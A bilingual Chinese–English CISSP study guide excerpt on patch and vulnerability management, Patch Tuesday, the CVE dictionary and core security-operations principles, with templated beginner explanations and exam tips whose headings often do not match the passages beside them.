评估补丁。 当供应商发布或公布补丁时, 管理员会评估它们,以确定是否适用于其系统。 例如,为修复配置为域名系统 (DNS)服务器的 Unix 系统中的漏洞而发布的补丁,对于在 Windows 上运 行 DNS 的服务器而言并不相关。 同样,如果某个功能未安装,则无需发布用 于修复 Windows 系统上该功能的补丁。 测试补丁。 在可能的情况下,管理员会在隔离的非生产系统上测试补丁,以确定 补丁是否会引起任何不希望的副作用。 最坏的情况是,系统在应用补丁后将无法 启动。 例如,补丁偶尔会导致系统进入无限重启循环:系统启动后出现停止错误, 并不断尝试重启以恢复该错误。 如果在单个系统上测试发现此问题,仅影响一个 系统。 然而,如果一个组织在测试之前就将补丁应用于一千台计算机,可能会造 成灾难性后果。 较小的组织通常选择不评估、测试和批准补丁,而是使用自动方法来 批准和部署补丁。 Windows 系统包含 Windows 更新,这使得该过程变得 简单。 然而,较大的组织通常会掌控该过程,以防止更新导致潜在的停机。 批准补丁。 管理员在测试补丁并确认其安全后,批准补丁进行部署。

通常会 将变更管理流程(本章前面已介绍)作为批准过程的一部分。 部署补丁。 在测试和批准之后,管理员部署补丁。 许多组织使用自动化方法来部 署补丁。 这些方法可以是第三方产品或软件供应商提供的产品。 验证补丁已部署。 部署补丁后,管理员会定期测试和审计系统,以确保系统保持 打补丁状态。 许多部署工具都包含审计系统的能力。 此外,许多漏洞评估工具也 具备检查系统以确保其具有适当补丁的功能。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

审计:审计记录主体行为,用于追责、复盘和取证。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

没有日志和身份绑定,就很难问责。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
审计 审计记录主体行为,用于追责、复盘和取证。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 38 / PDF P1124

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Patch Tuesday and Exploit Wednesday Microsoft, Adobe, and Oracle regularly release patches on the second Tuesday of every month, commonly called Patch Tuesday or Update Tuesday. The regular schedule allows administrators to plan for the release of patches so that they have adequate time to test and deploy them. Many organizations that have support contracts with Microsoft have advance notification of the patches prior to Patch Tuesday. Some vulnerabilities are significant enough that Microsoft releases them “outof-band.” In other words, instead of waiting for the next Patch Tuesday to release a patch, Microsoft releases some patches earlier.

Attackers realize that many organizations do not patch their systems right away. Some malicious actors have reverse-engineered patches to identify the underlying vulnerability and then created methods to exploit the vulnerability. These attacks often start within a day after Patch Tuesday, giving rise to the term exploit Wednesday. However, many attacks occur on unpatched systems weeks, months, and even years after vendors release the patches. In other words, many systems remain unpatched, and attackers exploit them much later than a day after the vendor released the patch.

Vulnerability Management Vulnerability management refers to regularly identifying vulnerabilities, evaluating them, and taking steps to mitigate risks associated with them. It isn't possible to eliminate risks. Similarly, it isn't possible to eliminate all vulnerabilities. However, an effective vulnerability management program helps an organization ensure that it is regularly evaluating vulnerabilities and mitigating the vulnerabilities that represent the greatest risks. Two common elements of a vulnerability management program are routine vulnerability scans and periodic vulnerability assessments.

中文直译 / 整理

补丁星期二与漏洞利用星期三 微软、Adobe 和 Oracle 每月第二个星期二定期发布补丁,通常称为补丁 星期二或更新星期二。 定期的发布计划使管理员能够为补丁的发布做好规 划,从而有充足的时间进行测试和部署。 许多与微软签订支持合同的组织 在补丁星期二之前会提前收到补丁通知。 某些漏洞足够严重,以至于微软 会“脱离常规”发布补丁。 换句话说,微软不会等待下一个补丁星期二, 而是提前发布某些补丁。 攻击者意识到许多组织不会立即修补其系统。 一些恶意行为者已对补丁进行 逆向工程,以识别底层漏洞,然后创建了利用该漏洞的方法。 这些攻击通常 在补丁星期二后一天内开始,从而产生了漏洞利用星期三这一术语。 然而,许多攻击发生在系统未修补数周、数月甚至数年之后,尽管供应商 已发布补丁。 换句话说,许多系统仍处于未修补状态,攻击者在供应商发 布补丁远超一天后才对其进行利用。 漏洞管理 漏洞管理是指定期识别漏洞、评估漏洞,并采取措施缓解与之相关的风险。 无法完全消除风险。 同样,也无法消除所有漏洞。 然而,一个有效的漏洞管理 计划有助于组织确保定期评估漏洞,并缓解那些代表最大风险的漏洞。

漏洞管 理计划的两个常见要素是定期漏洞扫描和周期性漏洞评估。

小白解释

场景先行:你是公司的安全负责人,正在读第 1124 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

NIST:NIST 提供美国常用安全标准、框架和指南。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
NIST NIST 提供美国常用安全标准、框架和指南。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 39 / PDF P1125

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

One of the most common vulnerabilities within an organization is an unpatched system, and so a vulnerability management program will often work in conjunction with a patch management program. In many cases, the duties of the two programs are separated between different employees. One person or group would be responsible for keeping systems patched, and another person or group would be responsible for verifying that the systems are patched. As with other segregation of duties implementations, this approach provides checks and balances within the organization. Vulnerability Scans Vulnerability scanners are software tools used to test systems and networks for known security issues.

A vulnerability scan enumerates (or lists) all the vulnerabilities in a system. Attackers use vulnerability scanners to detect weaknesses in systems and networks, such as missing patches or weak passwords. After they detect the weaknesses, they launch attacks to exploit them. Administrators in many organizations use the same types of vulnerability scanners to detect vulnerabilities on their network. Their goal is to detect the vulnerabilities and mitigate them before an attacker discovers them. Scanners include the ability to generate reports identifying any vulnerabilities they discover.

The reports may recommend applying patches or making specific configuration or security setting changes to improve or impose security. These reports are passed on to personnel performing patch management and managing system settings. Simply recommending applying patches doesn't reduce the vulnerabilities. Administrators need to take steps to apply the patches. However, there may be situations where it isn't feasible or desirable to do so. For example, if a patch fixing a minor security issue breaks an application on a system, management may decide not to implement the fix until developers create a workaround.

The vulnerability scanner will regularly report the vulnerability, even though the organization has addressed the risk.

中文直译 / 整理

组织中最常见的漏洞之一是未打补丁的系统,因此漏洞管理计划通常会 与补丁管理计划协同工作。 在许多情况下,这两个计划的职责由不同的员工 分担。 一个人或一组人负责保持系统打补丁,另一个人或一组人负责验证系 统是否已打补丁。 与其他职责分离的实施方式一样,这种方法在组织内部提 供了制衡机制。 漏洞扫描 漏洞扫描器是用于测试系统和网络中已知安全问题的软件工具。 漏洞扫描 会枚举(或列出)系统中的所有漏洞。 攻击者使用漏洞扫描器来检测系统和网 络中的弱点,例如缺少补丁或弱密码。 在检测到这些弱点后,他们会发起攻击 以利用这些弱点。 许多组织的管理员使用相同类型的漏洞扫描器来检测其网络 中的漏洞,其目标是在攻击者发现之前检测并缓解这些漏洞。 扫描器具备生成报告的能力,以识别其发现的任何漏洞。 这些报告可能建议应 用补丁或进行特定的配置或安全设置更改,以增强或强化安全性。 这些报告会 被传递给负责补丁管理和系统设置的人员。 仅仅建议应用补丁并不能减少漏洞。 管理员需要采取措施来应用这些补丁。 然而,可能存在一些情况,使得这样做不可行或不理想。

例如,如果一个修复 轻微安全问题的补丁导致系统上的某个应用程序崩溃,管理层可能决定在开发 人员提供变通方案之前不实施该修复。 漏洞扫描器会定期报告该漏洞,即使组 织已应对了该风险。

小白解释

场景先行:你是公司的安全负责人,正在读第 1125 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

漏洞扫描:漏洞扫描用工具找已知弱点。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 40 / PDF P1126

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Management can choose to accept a risk rather than mitigate it. Any risk that remains after applying a control is residual risk. Any losses that occur from residual risk are the responsibility of management. In contrast, an organization that never performs vulnerability scans will likely have many vulnerabilities. Additionally, these vulnerabilities will remain unknown, and management will not have the opportunity to decide which vulnerabilities to mitigate and which ones to accept. Common Vulnerabilities and Exposures Vulnerabilities are commonly referred to using the Common Vulnerabilities and Exposures (CVE) dictionary.

The CVE dictionary provides a standard convention used to identify and describe vulnerabilities. MITRE maintains the CVE database, and you can view it here: www.cve.org. MITRE looks like an acronym, but it isn't. The founders do have a history as research engineers at the Massachusetts Institute of Technology (MIT) and the name reminds people of that history. However, MITRE is not a part of MIT. MITRE receives funding from the U.S. Department of Homeland Security (DHS) and the Cybersecurity and Infrastructure Security Agency (CISA) to maintain the CVE database.

Patch management and vulnerability management tools commonly use the CVE dictionary as a standard when scanning for specific vulnerabilities. As an example, CVE-2020-0601 identifies a vulnerability in the Windows CryptoAPI (Crypt32.dll). Microsoft patched this vulnerability in the January 2020 security update. The CVE database makes it easier for companies that create patch management and vulnerability management tools. They don't have to expend any resources to manage the naming and definition of vulnerabilities, but instead focus on methods used to check systems for the vulnerabilities. Summary

中文直译 / 整理

管理层可以选择接受风险而非缓解风险。 在应用控制措施后仍存在的任 何风险均为残余风险。 由残余风险造成的任何损失均由管理层负责。 相比之下,从不执行漏洞扫描的组织很可能存在大量漏洞。 此外,这些漏洞将 长期未知,管理层也就无法决定哪些漏洞需要修复,哪些漏洞可以接受。 通用漏洞和暴露 漏洞通常使用通用漏洞和暴露(CVE)字典进行引用。 CVE 字典提供了一种 用于识别和描述漏洞的标准规范。 MITRE 维护着 CVE 数据库,您可以在以 下网址查看:www.cve.org。 MITRE 看起来像是一个缩写,但实际上并不是。 其创始人曾是麻省理 工学院(MIT)的研究工程师,名称正是为了提醒人们这段历史。 然而, MITRE 并非 MIT 的一部分。 MITRE 接受美国国土安全部(DHS)和网络 安全与基础设施安全局(CISA)的资助,以维护 CVE 数据库。 补丁管理和漏洞管理工具在扫描特定漏洞时,通常以 CVE 字典作为标准。 例如, CVE‑2020‑0601 标识了 Windows CryptoAPI(Crypt32.dll)中的一个漏洞。 微软在 2020 年 1 月的安全更新中修复了该漏洞。

CVE 数据库使创建补丁管理和漏洞管理工具的公司更加便捷。 它们无需投入任 何资源来管理漏洞的命名和定义,而是专注于用于检查系统是否存在漏洞的方 法。 摘要

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

漏洞扫描:漏洞扫描用工具找已知弱点。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

扫描发现弱点,不等于已经成功利用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
漏洞扫描 漏洞扫描用工具找已知弱点。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P1127

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Several basic security principles are at the core of security operations in any environment. These include need-to-know, least privilege, segregation of duties (SoD) and responsibilities, job rotation and mandatory vacations, privileged account management, and service-level agreements (SLAs). Combined, these practices help prevent security incidents from occurring and limit the scope of incidents that do occur. When addressing personnel safety and security, safety of personnel should always be a high priority. Duress systems allow guards to raise silent alarms in response to emergencies, and emergency management plans help the organization respond to disasters.

Traveling presents unique risks to employees, such as the loss of data, malware installed on unattended systems, and intercepted data when using free Wi-Fi networks. Safety training and awareness programs ensure that personnel know the various risks and ways to mitigate them. Training and awareness programs should also address other critical issues, including the insider threat, social media use, and multifactor authentication fatigue. Asset management extends beyond media to any asset considered valuable to an organization. This includes both tangible and intangible assets. Tangible assets include hardware and software, and organizations commonly inventory these assets to track them.

Intangible assets include patents, trademarks, and copyrights, and organizations track these assets as well. With resource protection, media and other assets that contain data are protected throughout their life cycle. Media includes anything that can hold data, such as tapes, internal drives, portable drives, CDs and DVDs, mobile devices, memory cards, and printouts. Media holding sensitive information should be marked, handled, stored, and destroyed using methods that are acceptable within the organization. Managed services in the cloud include any resources stored in or accessed via the cloud.

When negotiating with cloud service providers, you must understand who is responsible for maintenance and security. In general, the cloud service provider has the most responsibility with software as a service (SaaS) resources, less responsibility with platform as a service (PaaS) offerings, and the least responsibility with infrastructure as a service (IaaS) offerings. Cloud services commonly provide elasticity, which is the ability of services to dynamically respond to changing workload requirements. Change and configuration management are two additional controls that help reduce outages. Configuration management ensures that systems are

中文直译 / 整理

在任何环境中的安全运营核心都包含若干基本安全原则。 这些原则包括知所必 需、最小权限、职责分离(SoD)与责任划分、岗位轮换与强制休假、特权账 户管理以及服务级别协议(SLAs)。 这些实践相结合,有助于防止安全事件的 发生,并限制已发生事件的影响范围。 在处理人员安全与安保时,人员安全应始终是首要任务。 胁迫系统允许安保 人员在紧急情况下发出无声警报,而应急管理系统则帮助组织应对灾难。 出 差为员工带来独特风险,例如数据丢失、未受监控系统上安装的恶意软件, 以及在使用免费Wi‑Fi网络时数据被截获。 安全培训与意识计划确保人员了解 各种风险及缓解方法。 培训与意识计划还应涵盖其他关键问题,包括内部威 胁、社交媒体使用和多因素身份验证疲劳。 资产管理不仅限于媒体,还包括组织认为有价值的任何资产。 这包括有形资产 和无形资产。 有形资产包括硬件和软件,组织通常会对这些资产进行盘点以进 行跟踪。 无形资产包括专利、商标和版权,组织也会对这些资产进行跟踪。 在资源保护方面,包含数据的媒体及其他资产在其整个生命周期中均受到保 护。

媒体包括任何可存储数据的媒介,例如磁带、内置驱动器、便携式驱动 器、CD和DVD、移动设备、存储卡和打印输出。 存储敏感信息的媒体应按照 组织认可的方法进行标记、处理、存储和销毁。 云中的托管服务包括存储在云中或通过云访问的任何资源。 在与云服务提供商 谈判时,您必须明确谁负责维护和安全。 通常,云服务提供商对软件即服务 (SaaS)资源的责任最大,对平台即服务(PaaS)产品的责任较小,对基础 设施即服务(IaaS)产品的责任最小。 云服务通常提供弹性,即服务动态响应 工作负载变化需求的能力。 变更管理和配置管理是两项有助于减少停机的额外控制措施。 配置管理确保系统

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

身份:身份是主体在系统中的标识。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

身份管理题要区分识别、认证、授权、审计。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
身份 身份是主体在系统中的标识。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 42 / PDF P1128

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

deployed in a consistent manner that is known to be secure. Imaging is a common configuration management technique that ensures that systems start with a known baseline. Change management helps reduce unintended outages from unauthorized changes and can also help prevent changes from weakening security. Patch and vulnerability management procedures work together to keep systems protected against known vulnerabilities. Patch management keeps systems up-to-date with relevant patches. Vulnerability management includes vulnerability scans to check for a wide variety of known vulnerabilities (including unpatched systems).

Study Essentials Know the difference between need-to-know and the least privilege principle. Need-to-know and the least privilege principle are two standard IT security principles implemented in secure networks. They limit access to data and systems so that users and other subjects can access only what they require. This limited access helps prevent security incidents and helps limit the scope of incidents when they occur. When these principles are not followed, security incidents result in far greater damage to an organization. Understand segregation of duties and job rotation.

Segregation of duties (SoD) is a basic security principle that ensures that no single person can control all critical functions or system elements. With job rotation, employees are rotated into different jobs, or tasks are assigned to different employees. Collusion is an agreement among multiple persons to perform some unauthorized or illegal actions. Implementing these policies helps prevent fraud by limiting actions individuals can do without colluding with others. Know about monitoring privileged operations. Privileged entities are trusted, but they can abuse their privileges. Because of this, it's essential to monitor all assignment of privileges and the use of privileged operations.

The goal is to ensure that trusted employees do not abuse the special privileges they are granted. Monitoring these operations can also detect many attacks because attackers commonly use special privileges during an attack. Advanced privileged account management practices can limit the time users have advanced privileges.

中文直译 / 整理

部署在一种已知安全的一致方式中。 镜像是一种常见的配置管理技术,可确 保系统从已知的基线开始。 变更管理有助于减少因未经授权的变更导致的意 外中断,并且还能帮助防止变更削弱安全性。 补丁和漏洞管理流程协同工作,以保护系统免受已知漏洞的威胁。 补丁管理确 保系统及时更新相关补丁。 漏洞管理包括漏洞扫描,以检测各种已知漏洞(包 括未打补丁的系统)。 学习要点 了解“必需知道”原则与最小权限原则之间的区别。 “必需知道”原则与最小权 限原则是安全网络中实施的两项标准IT安全原则。 它们限制用户和其他主体仅能 访问其所需的数据和系统,从而帮助防止安全事件,并在事件发生时限制其影响 范围。 若不遵循这些原则,安全事件将对组织造成远为严重的损害。 理解职责分离与岗位轮换。 职责分离(SoD)是一项基本的安全原则,确保没 有任何个人能够独立控制所有关键功能或系统元素。 通过岗位轮换,员工会被 轮换到不同的岗位,或任务被分配给不同的员工。 串通是指多人达成协议,实 施某些未经授权或非法的行为。 实施这些政策有助于防止欺诈,通过限制个人 在不与其他人员串通的情况下所能执行的操作。 了解对特权操作的监控。

特权实体是受信任的,但它们可能滥用其特权。 因此, 监控所有特权的分配和特权操作的使用至关重要。 目标是确保受信任的员工不会 滥用他们被授予的特殊权限。 监控这些操作还可以检测许多攻击,因为攻击者通 常在攻击期间使用特殊权限。 高级特权账户管理实践可以限制用户拥有高级权限的时间。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

扫描发现弱点,不等于已经成功利用。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
漏洞扫描 漏洞扫描用工具找已知弱点。
学习单元 43 / PDF P1129

第 1129 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Understand service-level agreements. Organizations use service-level agreements (SLAs) with outside entities such as vendors. They stipulate performance expectations such as maximum downtimes and often include penalties if the vendor doesn't meet expectations. Describe personnel safety and security concerns. Duress systems allow guards to raise alarms in response to emergencies, and emergency management plans help the organization respond to disasters. When employees travel, employees need to be aware of the risks, especially if they travel to different counties. Safety training and awareness programs ensure employees know about these risks and ways to mitigate them.

Understand secure provisioning concepts. Secure provisioning of resources includes ensuring that resources are deployed in a secure manner and are maintained in a secure manner throughout their life cycles. Asset management tracks tangible assets (hardware and software) and intangible assets (such as patents, trademarks, the company's goodwill, and copyrights). Know how to manage and protect media. Media management techniques track media used to hold sensitive data. Media is protected throughout its lifetime and destroyed when it's no longer needed. Know the difference between SaaS, PaaS, and IaaS.

Software as a service (SaaS) models provide fully functional applications typically accessible via a web browser. Platform as a service (PaaS) models provide consumers with a computing platform, including hardware, operating systems, and a runtime environment. Infrastructure as a service (IaaS) models provide basic computing resources such as servers, storage, and networking resources. Know about serverless architecture. Serverless architecture is a cloud computing concept where code is managed by the customer, and the platform (i.e., supporting hardware and software) or server is managed by the cloud service provider (CSP).

There is always a physical server running the code, but this execution model allows the software designer/architect/programmer/developer to focus on the logic of their code and not have to be concerned about the parameters or limitations of a specific server. This is also known as function as a service (FaaS). Recognize security issues with managed services in the cloud. Managed services in the cloud include any resources stored in or accessed via the cloud. Storing data in the cloud increases the risk, so additional steps may be necessary to protect the data, depending on its value. When leasing cloud-

中文直译 / 整理

了解服务级别协议。 组织与外部实体(如供应商)签订服务级别协议(SLA)。 这些协议规定了性能期望,例如最大停机时间,并通常包含供应商未达到期望 时的处罚条款。 描述人员安全和安保问题。 胁迫系统允许安保人员在应对紧急情况时发出警报, 应急管理系统帮助组织应对灾难。 当员工出差时,他们需要了解相关风险,特 别是前往不同国家时。 安全培训和意识计划确保员工了解这些风险及缓解措施。 理解安全配置概念。 资源的安全配置包括确保资源以安全的方式部署,并在其 整个生命周期内保持安全状态。 资产管理追踪有形资产(硬件和软件)和无形 资产(如专利、商标、公司商誉和版权)。 了解如何管理和保护介质。 介质管理技术追踪用于存储敏感数据的介质。 介质在其整个生命周期内受到保护,并在不再需要时被销毁。 了解SaaS、PaaS和IaaS之间的区别。 软件即服务(SaaS)模型提供功能完 整的应用程序,通常可通过网页浏览器访问。 平台即服务(PaaS)模型为用 户提供计算平台,包括硬件、操作系统和运行时环境。 基础设施即服务( IaaS)模型提供基本的计算资源,如服务器、存储和网络资源。 了解无服务器架构。

无服务器架构是一种云计算概念,在这种架构中,代码由 客户管理,而平台(即支持的硬件和软件)或服务器由云服务提供商(CSP) 管理。 始终存在一台物理服务器运行代码,但这种执行模型使软件 设计师/架构师/程序员/开发者能够专注于代码的逻辑,而无需关注特定服务器 的参数或限制。 这也被称为函数即服务(FaaS)。 识别云中托管服务的安全问题。 云中的托管服务包括任何存储在云中或通过云访问的资源。 将数据存储在云中会增 加风险,因此根据数据的价值,可能需要采取额外措施来保护数据。 当租赁云‑

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1129 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 44 / PDF P1130

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

based services, you must understand who is responsible for maintenance and security. The cloud service provider provides the least amount of maintenance and security in the IaaS model. Explain configuration and change control management. Many outages and incidents can be prevented with effective configuration and change management programs. Configuration management (CM) ensures that systems are configured similarly and the configurations of systems are known and documented. Baselining ensures that systems are deployed with a common baseline or starting point, and imaging is a common baselining method. Change management helps reduce outages or weakened security from unauthorized changes.

A CM process requires changes to be requested, reviewed, approved, tested, scheduled and implemented, and documented. Versioning uses a labeling or numbering system to track changes in updated versions of software. Understand patch management. Patch management ensures that systems are kept up-to-date with current patches. You should know that an effective patch management program will evaluate, test, approve, and deploy patches. Additionally, be aware that system audits verify the deployment of approved patches to systems. Patch management is often intertwined with change and configuration management to ensure that documentation reflects the changes.

